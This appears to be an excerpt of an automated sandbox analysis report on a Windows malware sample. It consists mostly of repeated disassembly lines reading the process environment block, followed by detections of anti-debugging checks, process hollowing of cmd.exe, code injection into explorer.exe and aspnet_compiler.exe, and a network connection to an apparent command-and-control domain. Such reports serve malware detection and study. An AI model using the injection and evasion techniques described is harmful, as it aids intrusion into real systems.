Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E76E2 mov eax, dword ptr fs:[00000030h]	3_2_010E76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011016E0 mov ecx, dword ptr fs:[00000030h]	3_2_011016E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01102AE4 mov eax, dword ptr fs:[00000030h]	3_2_01102AE4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001DB5E0 mov eax, dword ptr fs:[00000030h]	14_2_001DB5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D18ED6 mov eax, dword ptr fs:[00000030h]	14_2_02D18ED6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C736CC mov eax, dword ptr fs:[00000030h]	14_2_02C736CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C72ACB mov eax, dword ptr fs:[00000030h]	14_2_02C72ACB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CFFEC0 mov eax, dword ptr fs:[00000030h]	14_2_02CFFEC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C88EC7 mov eax, dword ptr fs:[00000030h]	14_2_02C88EC7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C72AE4 mov eax, dword ptr fs:[00000030h]	14_2_02C72AE4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C716E0 mov ecx, dword ptr fs:[00000030h]	14_2_02C716E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C576E2 mov eax, dword ptr fs:[00000030h]	14_2_02C576E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDFE87 mov eax, dword ptr fs:[00000030h]	14_2_02CDFE87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7D294 mov eax, dword ptr fs:[00000030h]	14_2_02C7D294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7D294 mov eax, dword ptr fs:[00000030h]	14_2_02C7D294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]	14_2_02C452A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]	14_2_02C452A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]	14_2_02C452A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]	14_2_02C452A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]	14_2_02C452A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC46A7 mov eax, dword ptr fs:[00000030h]	14_2_02CC46A7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D10EA5 mov eax, dword ptr fs:[00000030h]	14_2_02D10EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D10EA5 mov eax, dword ptr fs:[00000030h]	14_2_02D10EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D10EA5 mov eax, dword ptr fs:[00000030h]	14_2_02D10EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5AAB0 mov eax, dword ptr fs:[00000030h]	14_2_02C5AAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5AAB0 mov eax, dword ptr fs:[00000030h]	14_2_02C5AAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7FAB0 mov eax, dword ptr fs:[00000030h]	14_2_02C7FAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C49240 mov eax, dword ptr fs:[00000030h]	14_2_02C49240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C49240 mov eax, dword ptr fs:[00000030h]	14_2_02C49240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C49240 mov eax, dword ptr fs:[00000030h]	14_2_02C49240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C49240 mov eax, dword ptr fs:[00000030h]	14_2_02C49240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]	14_2_02C57E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]	14_2_02C57E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]	14_2_02C57E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]	14_2_02C57E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]	14_2_02C57E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]	14_2_02C57E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D0EA55 mov eax, dword ptr fs:[00000030h]	14_2_02D0EA55
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D0AE44 mov eax, dword ptr fs:[00000030h]	14_2_02D0AE44
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D0AE44 mov eax, dword ptr fs:[00000030h]	14_2_02D0AE44
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CD4257 mov eax, dword ptr fs:[00000030h]	14_2_02CD4257
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5766D mov eax, dword ptr fs:[00000030h]	14_2_02C5766D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CFB260 mov eax, dword ptr fs:[00000030h]	14_2_02CFB260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CFB260 mov eax, dword ptr fs:[00000030h]	14_2_02CFB260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C8927A mov eax, dword ptr fs:[00000030h]	14_2_02C8927A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D18A62 mov eax, dword ptr fs:[00000030h]	14_2_02D18A62
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]	14_2_02C6AE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]	14_2_02C6AE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]	14_2_02C6AE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]	14_2_02C6AE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]	14_2_02C6AE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4C600 mov eax, dword ptr fs:[00000030h]	14_2_02C4C600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4C600 mov eax, dword ptr fs:[00000030h]	14_2_02C4C600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4C600 mov eax, dword ptr fs:[00000030h]	14_2_02C4C600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C78E00 mov eax, dword ptr fs:[00000030h]	14_2_02C78E00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C58A0A mov eax, dword ptr fs:[00000030h]	14_2_02C58A0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4AA16 mov eax, dword ptr fs:[00000030h]	14_2_02C4AA16
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4AA16 mov eax, dword ptr fs:[00000030h]	14_2_02C4AA16
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C45210 mov eax, dword ptr fs:[00000030h]	14_2_02C45210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C45210 mov ecx, dword ptr fs:[00000030h]	14_2_02C45210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C45210 mov eax, dword ptr fs:[00000030h]	14_2_02C45210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C45210 mov eax, dword ptr fs:[00000030h]	14_2_02C45210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01608 mov eax, dword ptr fs:[00000030h]	14_2_02D01608
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C63A1C mov eax, dword ptr fs:[00000030h]	14_2_02C63A1C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7A61C mov eax, dword ptr fs:[00000030h]	14_2_02C7A61C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7A61C mov eax, dword ptr fs:[00000030h]	14_2_02C7A61C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4E620 mov eax, dword ptr fs:[00000030h]	14_2_02C4E620
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C84A2C mov eax, dword ptr fs:[00000030h]	14_2_02C84A2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C84A2C mov eax, dword ptr fs:[00000030h]	14_2_02C84A2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CFFE3F mov eax, dword ptr fs:[00000030h]	14_2_02CFFE3F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC53CA mov eax, dword ptr fs:[00000030h]	14_2_02CC53CA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC53CA mov eax, dword ptr fs:[00000030h]	14_2_02CC53CA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]	14_2_02C703E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]	14_2_02C703E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]	14_2_02C703E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]	14_2_02C703E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]	14_2_02C703E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]	14_2_02C703E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C6DBE9 mov eax, dword ptr fs:[00000030h]	14_2_02C6DBE9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C837F5 mov eax, dword ptr fs:[00000030h]	14_2_02C837F5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C51B8F mov eax, dword ptr fs:[00000030h]	14_2_02C51B8F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C51B8F mov eax, dword ptr fs:[00000030h]	14_2_02C51B8F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CFD380 mov ecx, dword ptr fs:[00000030h]	14_2_02CFD380
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C72397 mov eax, dword ptr fs:[00000030h]	14_2_02C72397
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C58794 mov eax, dword ptr fs:[00000030h]	14_2_02C58794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7B390 mov eax, dword ptr fs:[00000030h]	14_2_02C7B390
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC7794 mov eax, dword ptr fs:[00000030h]	14_2_02CC7794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC7794 mov eax, dword ptr fs:[00000030h]	14_2_02CC7794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC7794 mov eax, dword ptr fs:[00000030h]	14_2_02CC7794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D0138A mov eax, dword ptr fs:[00000030h]	14_2_02D0138A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C74BAD mov eax, dword ptr fs:[00000030h]	14_2_02C74BAD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C74BAD mov eax, dword ptr fs:[00000030h]	14_2_02C74BAD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C74BAD mov eax, dword ptr fs:[00000030h]	14_2_02C74BAD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D15BA5 mov eax, dword ptr fs:[00000030h]	14_2_02D15BA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4DB40 mov eax, dword ptr fs:[00000030h]	14_2_02C4DB40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5EF40 mov eax, dword ptr fs:[00000030h]	14_2_02C5EF40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D18B58 mov eax, dword ptr fs:[00000030h]	14_2_02D18B58
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4F358 mov eax, dword ptr fs:[00000030h]	14_2_02C4F358
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4DB60 mov ecx, dword ptr fs:[00000030h]	14_2_02C4DB60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5FF60 mov eax, dword ptr fs:[00000030h]	14_2_02C5FF60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D18F6A mov eax, dword ptr fs:[00000030h]	14_2_02D18F6A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C73B7A mov eax, dword ptr fs:[00000030h]	14_2_02C73B7A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C73B7A mov eax, dword ptr fs:[00000030h]	14_2_02C73B7A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7A70E mov eax, dword ptr fs:[00000030h]	14_2_02C7A70E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7A70E mov eax, dword ptr fs:[00000030h]	14_2_02C7A70E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D0131B mov eax, dword ptr fs:[00000030h]	14_2_02D0131B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C6F716 mov eax, dword ptr fs:[00000030h]	14_2_02C6F716
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D1070D mov eax, dword ptr fs:[00000030h]	14_2_02D1070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D1070D mov eax, dword ptr fs:[00000030h]	14_2_02D1070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDFF10 mov eax, dword ptr fs:[00000030h]	14_2_02CDFF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDFF10 mov eax, dword ptr fs:[00000030h]	14_2_02CDFF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C44F2E mov eax, dword ptr fs:[00000030h]	14_2_02C44F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C44F2E mov eax, dword ptr fs:[00000030h]	14_2_02C44F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7E730 mov eax, dword ptr fs:[00000030h]	14_2_02C7E730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D18CD6 mov eax, dword ptr fs:[00000030h]	14_2_02D18CD6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]	14_2_02CDB8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDB8D0 mov ecx, dword ptr fs:[00000030h]	14_2_02CDB8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]	14_2_02CDB8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]	14_2_02CDB8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]	14_2_02CDB8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]	14_2_02CDB8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C458EC mov eax, dword ptr fs:[00000030h]	14_2_02C458EC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D014FB mov eax, dword ptr fs:[00000030h]	14_2_02D014FB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6CF0 mov eax, dword ptr fs:[00000030h]	14_2_02CC6CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6CF0 mov eax, dword ptr fs:[00000030h]	14_2_02CC6CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6CF0 mov eax, dword ptr fs:[00000030h]	14_2_02CC6CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C49080 mov eax, dword ptr fs:[00000030h]	14_2_02C49080
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC3884 mov eax, dword ptr fs:[00000030h]	14_2_02CC3884
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC3884 mov eax, dword ptr fs:[00000030h]	14_2_02CC3884
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5849B mov eax, dword ptr fs:[00000030h]	14_2_02C5849B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C890AF mov eax, dword ptr fs:[00000030h]	14_2_02C890AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]	14_2_02C720A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]	14_2_02C720A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]	14_2_02C720A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]	14_2_02C720A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]	14_2_02C720A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]	14_2_02C720A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7F0BF mov ecx, dword ptr fs:[00000030h]	14_2_02C7F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7F0BF mov eax, dword ptr fs:[00000030h]	14_2_02C7F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7F0BF mov eax, dword ptr fs:[00000030h]	14_2_02C7F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7A44B mov eax, dword ptr fs:[00000030h]	14_2_02C7A44B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C60050 mov eax, dword ptr fs:[00000030h]	14_2_02C60050
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C60050 mov eax, dword ptr fs:[00000030h]	14_2_02C60050
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDC450 mov eax, dword ptr fs:[00000030h]	14_2_02CDC450
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CDC450 mov eax, dword ptr fs:[00000030h]	14_2_02CDC450
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D02073 mov eax, dword ptr fs:[00000030h]	14_2_02D02073
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D11074 mov eax, dword ptr fs:[00000030h]	14_2_02D11074
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C6746D mov eax, dword ptr fs:[00000030h]	14_2_02C6746D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D14015 mov eax, dword ptr fs:[00000030h]	14_2_02D14015
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D14015 mov eax, dword ptr fs:[00000030h]	14_2_02D14015
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]	14_2_02CC6C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]	14_2_02CC6C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]	14_2_02CC6C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]	14_2_02CC6C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]	14_2_02D01C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC7016 mov eax, dword ptr fs:[00000030h]	14_2_02CC7016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC7016 mov eax, dword ptr fs:[00000030h]	14_2_02CC7016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC7016 mov eax, dword ptr fs:[00000030h]	14_2_02CC7016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D1740D mov eax, dword ptr fs:[00000030h]	14_2_02D1740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D1740D mov eax, dword ptr fs:[00000030h]	14_2_02D1740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D1740D mov eax, dword ptr fs:[00000030h]	14_2_02D1740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]	14_2_02C7002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]	14_2_02C7002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]	14_2_02C7002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]	14_2_02C7002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]	14_2_02C7002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7BC2C mov eax, dword ptr fs:[00000030h]	14_2_02C7BC2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]	14_2_02C5B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]	14_2_02C5B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]	14_2_02C5B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]	14_2_02C5B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]	14_2_02CC6DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]	14_2_02CC6DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]	14_2_02CC6DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6DC9 mov ecx, dword ptr fs:[00000030h]	14_2_02CC6DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]	14_2_02CC6DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]	14_2_02CC6DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4B1E1 mov eax, dword ptr fs:[00000030h]	14_2_02C4B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4B1E1 mov eax, dword ptr fs:[00000030h]	14_2_02C4B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C4B1E1 mov eax, dword ptr fs:[00000030h]	14_2_02C4B1E1

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 3_2_01119910 NtAdjustPrivilegesToken,LdrInitializeThunk,

3_2_01119910

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C7310 SetUnhandledExceptionFilter,		14_2_001C7310
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		14_2_001C6FE3

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.mercydm.mobi
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 1B0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 97B008	Jump to behavior

.NET source code references suspicious native API functions

